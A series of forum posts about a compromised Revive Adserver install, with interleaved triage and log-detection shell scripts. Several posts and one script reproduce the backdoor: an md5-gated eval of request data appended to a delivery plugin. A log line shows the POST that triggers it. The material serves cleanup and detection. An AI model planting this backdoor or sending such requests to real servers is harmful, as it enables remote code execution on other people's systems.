Posts posted by tvvpmi

  1. I have upgraded from Revive 4.2.1 to 5.0.0
    After the upgrade I have a lot of banners with cached delivery rules that DO NOT AGREE with the delivery rules for the banner.
    If I save the banner, the problem is solved.

    If I do a "Delivery Rules Check", I get all banners with this problem. At the bottom I have this message:


    Errors found
    Some inconsistancies were found above, you can repair these using the button below, this will recompile the compiled limitation for every banner/delivery rule set in the system

    Executing the "Recompile" action does nothing.

    The only action that solves the problem is to save each banner individually.

    [attachment: Banners-Delivery-Rules.png]

  2. 6 hours ago, TYWebmaster said:

    Has any of this been resolved? How are they getting back into the DB and making changes. I had varchar(0) on append/prepend on all zones and today its been changed back and the code is back in the Zones.

    If prepend/append zones are varchar(0), they can't insert code there for sure. Check if the code is inserted in the prepend/append fields of the banners table. As I posted before, if the injection is done using the same strategy, you can stop it by making the file "plugins/bannerTypeText/oxText/genericText.delivery.php" read-only. Another good measure is to disable PHP execution in the delivery images folder.

  3. Yes. Timestamps have been changed as well. You can use the Linux command "stat" to see the modification and change timestamps. The attacker is changing the "modification time" to the parent folder's "modification time" so as not to raise suspicion.

    This code is inserted via a POST call to fc.php. To avoid being reinfected you can change the write permissions on "plugins/bannerTypeText/oxText/genericText.delivery.php".

    Perhaps some Revive developer can tell us what the function of fc.php (front controller) is, so we can decide whether we can disable it or not.

  4. Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

    Probably it has been modified, adding a line like this at the end:

    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

    You have to remove it.

    Also you have to search in the "images folder" for some PHP script ... and remove it. Perhaps you can send it privately to @Ian vM

    Clean the prepend code of your zones ... via SQL or through the Revive backend. Search for iframes and JavaScript code.

    Disable PHP execution in the image folder, or move the image folder to "another place", as they are static files, and serve them through another subdomain. You don't need PHP for them.
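The checks and hardening steps described in the two posts above (grep the delivery plugin for the appended eval line, compare mtime against ctime with stat to spot the backdated timestamp, look for PHP dropped into the images folder, make the plugin read-only, and stop PHP from being served out of the images directory) as one runnable script. This is an added example, not code from the original posts or from Revive Adserver. Assumptions: a POSIX sh with GNU or BSD stat, find and grep; the install layout follows the paths named in the thread (plugins/bannerTypeText/oxText, www/images, www/delivery); Apache 2.4 honours .htaccess in www/images if you use write_no_php_htaccess. The sample install it builds under a temp directory is constructed for the demonstration.

```shell
#!/bin/sh
# Added triage helpers for the compromise discussed in this thread (example
# code, not part of Revive Adserver). Paths and the Apache syntax are assumptions.

# Lines that eval request data. The backdoor in this thread is gated by an md5
# check on $_REQUEST['oxText'], but any eval of $_REQUEST/$_GET/$_POST has no
# business in a delivery plugin. Prints "line:content"; exit status 1 if clean.
find_backdoor_lines() {
    grep -nE '@?eval\(\$_(REQUEST|GET|POST)\[' "$1"
}

# PHP files under a directory that should only hold static images.
count_php_in_dir() {
    find "$1" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.php[0-9]' \) \
        | wc -l | tr -d ' '
}

# mtime can be forged with touch; ctime cannot be set from user space without
# changing the system clock. A large gap means the modification time was backdated.
file_mtime() { stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"; }   # GNU, then BSD
file_ctime() { stat -c %Z "$1" 2>/dev/null || stat -f %c "$1"; }
mtime_ctime_gap() {
    m=$(file_mtime "$1"); c=$(file_ctime "$1")
    gap=$((c - m)); [ "$gap" -lt 0 ] && gap=$((-gap))
    echo "$gap"
}

# Hardening from the thread: read-only plugin file, and no PHP served from the
# images directory (Apache 2.4 .htaccess, assumed to be honoured there).
lock_delivery_plugin() { chmod a-w "$1"; }
write_no_php_htaccess() {
    cat > "$1/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|php[0-9])$">
    Require all denied
</FilesMatch>
EOF
}

# Constructed sample install reproducing what the posts describe: a backdoored
# plugin file whose mtime was copied from its (old) parent directory, and a
# stray PHP file in www/images. Prints the temp root.
make_sample_install() {
    root=$(mktemp -d)
    plugdir="$root/plugins/bannerTypeText/oxText"
    mkdir -p "$plugdir" "$root/www/images" "$root/www/delivery"
    cat > "$plugdir/genericText.delivery.php" <<'EOF'
<?php
// legitimate plugin code would be here
if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
EOF
    printf '<?php echo "dropper";\n' > "$root/www/images/cache.php"
    printf '<?php // front controller\n' > "$root/www/delivery/fc.php"
    touch -t 201801010000 "$plugdir"                           # parent dir dates from the install
    touch -r "$plugdir" "$plugdir/genericText.delivery.php"    # attacker's timestomp
    echo "$root"
}

# Walk an install root and print findings; exit status 1 if anything was found.
triage() {
    found=0
    f="$1/plugins/bannerTypeText/oxText/genericText.delivery.php"
    if hits=$(find_backdoor_lines "$f"); then
        echo "BACKDOOR in $f:"; echo "$hits"; found=1
    fi
    gap=$(mtime_ctime_gap "$f")
    [ "$gap" -gt 3600 ] && { echo "TIMESTOMP suspected on $f (ctime-mtime gap ${gap}s)"; found=1; }
    n=$(count_php_in_dir "$1/www/images")
    [ "$n" -gt 0 ] && { echo "$n PHP file(s) under $1/www/images"; found=1; }
    return $found
}

# Usage: sh triage.sh /path/to/revive ; with no argument, runs on the constructed sample.
triage "${1:-$(make_sample_install)}" || :
```

On a real install, run it against the install root and then apply lock_delivery_plugin and write_no_php_htaccess only after the backdoor line and any dropped files have been removed; a read-only plugin file that still contains the eval line protects nothing. The timestamp check is only meaningful if the attacker did not also have root, since ctime can be rewritten by changing the clock.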

  5. 16 hours ago, tvvpmi said:

    I have modified the fc.php script to log POST parameters. I'm waiting now for a new POST to check what we are receiving and to try to reproduce the attack

    I have more info. I have just received another attack. I have the POST parameters the attacker is using. Is any of the admins interested in receiving them?

  6. 15 minutes ago, tvvpmi said:

    Same here.

    From stat genericText.delivery.php
     2018-12-22 08:51:50.724940460 +0100

    Like in @snaggy case, this line has been added at the end of genericText.delivery.php

    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

  7. 3 hours ago, sunech said:

    Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
    Thank you for your assistance!

    I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the revive installation.
    @Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

    Same here.

    From stat genericText.delivery.php
     2018-12-22 08:51:50.724940460 +0100

  8. 6 hours ago, Ian vM said:

    @tvvpmi which version are you running ? did you upgrade from an older version in the past too ?

    The last one, 4.1.4

    I have upgraded from prior versions. But this installation comes from an old installation, from the 2.8 series.

    I have modified the fc.php script to log POST parameters. I'm waiting now for a new POST to check what we are receiving and to try to reproduce the attack

  9. CONFIRMED: the point of code injection in the prepend zones is the same one @sunech previously reported

    [06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=https://<adserver>/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"
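The log line above is the shape of the request that triggers the backdoor: a POST to www/delivery/fc.php naming the plugin through script=bannerTypeText:oxText:genericText, with a spoofed AdsBot-Google user agent and a fake Google referrer. As an added example (not part of the post), the awk filter below pulls such POSTs out of a combined-format access log and prints client IP, timestamp and user agent, so the hits can be matched against the ctime of genericText.delivery.php. The sample log lines are constructed and use documentation IP ranges; leaving GET requests to fc.php alone assumes ordinary text-banner delivery uses GET, which you should confirm against your own traffic baseline before alerting on this.

```shell
#!/bin/sh
# Added detection over Apache/nginx combined-format access logs for the
# request pattern seen in this thread. Example code, not part of Revive Adserver.
# Constructed sample: two POSTs matching the pattern, two benign GETs.
SAMPLE_LOG='203.0.113.5 - - [06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=x" "AdsBot-Google (+http://www.google.com/adsbot.html)"
198.51.100.7 - - [06/Jan/2019:12:23:10 +0100] "GET /www/delivery/ajs.php?zoneid=3&cb=123 HTTP/1.1" 200 1254 "https://example.org/page" "Mozilla/5.0"
203.0.113.5 - - [06/Jan/2019:12:25:01 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText HTTP/1.1" 200 23 "-" "curl/7.64.0"
198.51.100.9 - - [06/Jan/2019:12:26:44 +0100] "GET /www/delivery/fc.php?script=bannerTypeText:oxText:genericText&zoneid=5 HTTP/1.1" 200 410 "-" "Mozilla/5.0"'

# Reads log lines on stdin; prints "ip<TAB>timestamp<TAB>user-agent" for each
# POST to /www/delivery/fc.php that carries a script= parameter.
# Combined-format fields: $1 ip, $4 [timestamp, $6 "METHOD, $7 path; the UA is
# the last quoted string on the line.
flag_fc_posts() {
    awk '
      $6 == "\"POST" && $7 ~ /^\/www\/delivery\/fc\.php\?/ && $7 ~ /(\?|&)script=/ {
          ua = $0; sub(/.*" "/, "", ua); sub(/"$/, "", ua)
          ts = $4; sub(/^\[/, "", ts)
          printf "%s\t%s\t%s\n", $1, ts, ua
      }'
}

# Usage on a real server: flag_fc_posts < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | flag_fc_posts
```

A request carrying an AdsBot-Google user agent from an address outside Google's published crawler ranges is a second, independent signal worth adding once the basic filter has been validated against normal traffic.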

  10. Yes. I know that. I have been using OpenX Source for a long time, and before that phpAdsNew, and now Revive Adserver.

    By "new OpenX" I mean that company. I don't know what software they are using in their services.

    Reading the link

    https://github.com/ampproject/amphtml/blob/master/ads/openx.md

    you can see that there is a parameter to set the host where the adserver is running. That makes me think that OpenX was the open source OpenX.

    Of course I have tried it with my private version of OpenX and it doesn't work.

    Inserting JavaScript inside the AMP works. I have to try what happens when the page is cached at the Google AMP cache.
